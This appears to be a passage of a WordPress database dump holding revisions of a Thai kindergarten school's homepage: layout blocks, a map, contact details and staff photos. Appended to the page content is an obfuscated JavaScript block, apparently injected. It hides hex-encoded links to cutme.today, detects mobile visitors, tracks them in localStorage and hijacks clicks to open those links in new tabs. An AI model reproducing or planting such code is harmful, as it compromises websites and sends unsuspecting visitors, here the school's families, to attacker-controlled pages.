{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 10:33:57','2025-07-15 03:33:57','',19,'http://watprato.ssk.in.th/?p=669',0,'revision','',0),
(670,1,'2025-07-15 10:36:33','2025-07-15 03:36:33','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" 